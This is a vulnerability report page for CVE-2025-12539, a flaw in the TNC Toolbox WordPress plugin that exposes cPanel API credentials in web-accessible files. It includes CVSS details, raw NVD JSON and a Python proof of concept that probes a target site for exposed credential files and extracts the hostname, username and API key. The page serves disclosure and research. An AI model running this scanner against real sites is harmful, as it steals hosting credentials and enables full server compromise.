Security Vulnerability Report
中文
CVE-2025-12539 CVSS 10.0 CRITICAL

CVE-2025-12539

Published: 2025-11-11 11:15:33
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The TNC Toolbox: Web Performance plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.4.2. This is due to the plugin storing cPanel API credentials (hostname, username, and API key) in files within the web-accessible wp-content directory without adequate protection in the "Tnc_Wp_Toolbox_Settings::save_settings" function. This makes it possible for unauthenticated attackers to retrieve these credentials and use them to interact with the cPanel API, which can lead to arbitrary file uploads, remote code execution, and full compromise of the hosting environment.

CVSS Details

CVSS Score
10.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

TNC Toolbox: Web Performance plugin for WordPress <= 1.4.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import re # CVE-2025-12539 PoC - TNC Toolbox cPanel Credential Disclosure # Target: WordPress site with TNC Toolbox plugin < 1.4.3 def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-12539 The plugin stores cPanel credentials in web-accessible wp-content directory """ # Common credential file locations used by TNC Toolbox possible_paths = [ '/wp-content/tnc-toolbox-settings.json', '/wp-content/tnc_toolbox_config.txt', '/wp-content/.tnc_toolbox_credentials', '/wp-content/uploads/tnc_settings.json', '/wp-content/tnc-wp-toolbox-settings.dat' ] vulnerable_files = [] for path in possible_paths: url = target_url.rstrip('/') + path try: response = requests.get(url, timeout=10, verify=False) if response.status_code == 200: content = response.text # Check for cPanel credential patterns if any(keyword in content.lower() for keyword in ['cpanel', 'api_key', 'apikey', 'hostname', 'username']): if any(keyword in content for keyword in ['cpanel_host', 'cpanel_user', 'cpanel_api', 'cpsess']): vulnerable_files.append({ 'url': url, 'content': content, 'status': 'VULNERABLE' }) except requests.exceptions.RequestException: continue return vulnerable_files def extract_credentials(file_content): """ Extract cPanel credentials from exposed file """ credentials = {} # Extract hostname host_match = re.search(r'[\"\']?cpanel[_"]?host[name]?[\"\']?\s*[:=]\s*[\"\']([^\"\']+)[\"\']', file_content, re.I) if host_match: credentials['hostname'] = host_match.group(1) # Extract username user_match = re.search(r'[\"\']?cpanel[_"]?user[name]?[\"\']?\s*[:=]\s*[\"\']([^\"\']+)[\"\']', file_content, re.I) if user_match: credentials['username'] = user_match.group(1) # Extract API key apikey_match = re.search(r'[\"\']?cpanel[_"]?api[_"]?key[\"\']?\s*[:=]\s*[\"\']([^\"\']+)[\"\']', file_content, re.I) if apikey_match: credentials['api_key'] = apikey_match.group(1) return credentials def main(): import sys if len(sys.argv) < 2: print("Usage: python cve-2025-12539.py <target_url>") print("Example: python cve-2025-12539.py http://example.com") sys.exit(1) target = sys.argv[1] print(f"[*] Scanning target: {target}") print(f"[*] Checking for CVE-2025-12539 vulnerability...\n") results = check_vulnerability(target) if results: print(f"[!] VULNERABLE - Found {len(results)} exposed credential file(s)\n") for idx, result in enumerate(results, 1): print(f"[File {idx}] {result['url']}") creds = extract_credentials(result['content']) if creds: print(" Extracted credentials:") for key, value in creds.items(): print(f" - {key}: {value}") print() else: print("[*] No vulnerable credential files found") if __name__ == '__main__': main() # Note: This PoC is for authorized security testing only # Unauthorized access to computer systems is illegal

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12539", "sourceIdentifier": "[email protected]", "published": "2025-11-11T11:15:33.180", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The TNC Toolbox: Web Performance plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.4.2. This is due to the plugin storing cPanel API credentials (hostname, username, and API key) in files within the web-accessible wp-content directory without adequate protection in the \"Tnc_Wp_Toolbox_Settings::save_settings\" function. This makes it possible for unauthenticated attackers to retrieve these credentials and use them to interact with the cPanel API, which can lead to arbitrary file uploads, remote code execution, and full compromise of the hosting environment."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-922"}]}], "references": [{"url": "https://github.com/The-Network-Crew/TNC-Toolbox-for-WordPress/commit/31bb3040b22c84e2d6dfd3210fe0ad045ff4ddf6", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2eaa5a5c-c11f-40d0-be69-c3ec8029a819?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.